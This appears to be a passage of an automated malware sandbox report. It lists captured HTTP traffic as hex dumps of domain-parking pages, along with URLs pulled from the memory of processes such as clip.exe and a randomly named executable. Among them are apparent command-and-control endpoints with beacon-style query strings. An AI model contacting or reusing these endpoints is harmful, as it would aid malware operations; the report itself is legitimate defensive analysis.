Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 03:25:55 GMTServer: Apache/2.4.61 (Debian)X-Powered-By: PHP/7.4.33Strict-Transport-Security: max-age=63072000; preloadConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 34 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 6c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 5f 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 2f 64 61 74 61 2f 67 66 78 2f 64 74 5f 6c 6f 67 6f 5f 70 61 72 6b 69 6e 67 2e 70 6e 67 22 20 61 6c 74 3d 22 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 54 68 65 20 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 21 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 32 30 70 78 20 30 20 31 30 70 78 20 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 22 20 63 6c 61 73 73 3d 22 61 6c 69 67 6e 2d 63 65 6e 74 65 72 22 3e 41 6c 73 20 44 6f 6d 61 69 6e 69 6e 68 61 62 65 72 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 49 68 72 65 20 44 6f 6d 61 69 6e 73 20 6f 6e 6c 69 6e 65 20 76 65 72 77 61 6c 74 65 6e 2c
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 03:25:58 GMTServer: Apache/2.4.61 (Debian)X-Powered-By: PHP/7.4.33Strict-Transport-Security: max-age=63072000; preloadConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 64 33 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 6c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 5f 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 2f 64 61 74 61 2f 67 66 78 2f 64 74 5f 6c 6f 67 6f 5f 70 61 72 6b 69 6e 67 2e 70 6e 67 22 20 61 6c 74 3d 22 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 54 68 65 20 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 21 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 32 30 70 78 20 30 20 31 30 70 78 20 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 22 20 63 6c 61 73 73 3d 22 61 6c 69 67 6e 2d 63 65 6e 74 65 72 22 3e 41 6c 73 20 44 6f 6d 61 69 6e 69 6e 68 61 62 65 72 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 49 68 72 65 20 44 6f 6d 61 69 6e 73 20 6f 6e 6c 69 6e 65 20 76 65 72 77 61 6c 74 65 6e 2c
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 03:26:00 GMTServer: Apache/2.4.61 (Debian)X-Powered-By: PHP/7.4.33Strict-Transport-Security: max-age=63072000; preloadConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 63 30 30 0d 0a 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 6c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 5f 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 2f 64 61 74 61 2f 67 66 78 2f 64 74 5f 6c 6f 67 6f 5f 70 61 72 6b 69 6e 67 2e 70 6e 67 22 20 61 6c 74 3d 22 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 54 68 65 20 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 21 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 32 30 70 78 20 30 20 31 30 70 78 20 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 22 20 63 6c 61 73 73 3d 22 61 6c 69 67 6e 2d 63 65 6e 74 65 72 22 3e 41 6c 73 20 44 6f 6d 61 69 6e 69 6e 68 61 62 65 72 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 49 68 72 65 20 44 6f 6d 61 69 6e 73 20 6f 6e 6c 69 6e 65 20 76 65 72 77

Source: clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
Source: dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4101406394.0000000004C61000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.dmtxwuatbz.cc
Source: dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4101406394.0000000004C61000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.dmtxwuatbz.cc/lfkn/
Source: clip.exe, 00000003.00000002.4100415517.0000000005E98000.00000004.10000000.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.0000000003B68000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.domaintechnik.at/data/gfx/dt_logo_parking.png
Source: clip.exe, 00000003.00000003.2010171763.000000000770E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: clip.exe, 00000003.00000002.4100415517.000000000552C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000031FC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf
Source: clip.exe, 00000003.00000003.2010171763.000000000770E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: clip.exe, 00000003.00000002.4100415517.0000000005D06000.00000004.10000000.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000039D6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
Source: clip.exe, 00000003.00000002.4100415517.0000000005D06000.00000004.10000000.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000039D6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
Source: clip.exe, 00000003.00000002.4100415517.0000000005D06000.00000004.10000000.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000039D6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
Source: clip.exe, 00000003.00000003.2010171763.000000000770E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: clip.exe, 00000003.00000003.2010171763.000000000770E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: clip.exe, 00000003.00000002.4100415517.000000000552C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000031FC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd
Source: dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000031FC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://dts.gnpge.com
Source: clip.exe, 00000003.00000003.2010171763.000000000770E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: clip.exe, 00000003.00000003.2010171763.000000000770E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: clip.exe, 00000003.00000003.2010171763.000000000770E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: clip.exe, 00000003.00000002.4099123846.000000000289F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: clip.exe, 00000003.00000002.4099123846.00000000028D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: clip.exe, 00000003.00000002.4099123846.00000000028D3000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4099123846.000000000289F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: clip.exe, 00000003.00000002.4099123846.000000000289F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033y
Source: clip.exe, 00000003.00000002.4099123846.000000000289F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: clip.exe, 00000003.00000002.4099123846.000000000289F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: clip.exe, 00000003.00000003.2005760715.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
Source: clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
Source: clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
Source: clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
Source: clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
Source: clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
Source: clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
Source: clip.exe, 00000003.00000002.4100415517.0000000005E98000.00000004.10000000.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.0000000003B68000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/icons/control_panel_icon.gif
Source: clip.exe, 00000003.00000002.4100415517.0000000005E98000.00000004.10000000.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.0000000003B68000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/icons/sslserver.png
Source: clip.exe, 00000003.00000002.4100415517.0000000005E98000.00000004.10000000.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.0000000003B68000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/piwik.png
Source: clip.exe, 00000003.00000002.4100415517.0000000005E98000.00000004.10000000.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.0000000003B68000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/typo3-2.png
Source: clip.exe, 00000003.00000003.2010171763.000000000770E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: clip.exe, 00000003.00000003.2010171763.000000000770E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
Source: clip.exe, 00000003.00000002.4100415517.0000000004EE4000.00000004.10000000.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.0000000002BB4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2113945437.0000000024B44000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hprlz.cz/w6qg/?DnUL=_290s&kbRxoVY0=0lpTRQcDUH
Source: clip.exe, 00000003.00000002.4100415517.0000000004EE4000.00000004.10000000.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.0000000002BB4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2113945437.0000000024B44000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hprlz.cz/w6qg/?DnUL=_290s&kbRxoVY0=0lpTRQcDUH
Source: clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
Source: clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
Source: clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
Source: clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
Source: clip.exe, 00000003.00000002.4100415517.00000000059E2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4101945393.0000000007460000.00000004.00000800.00020000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4100008575.00000000036B2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
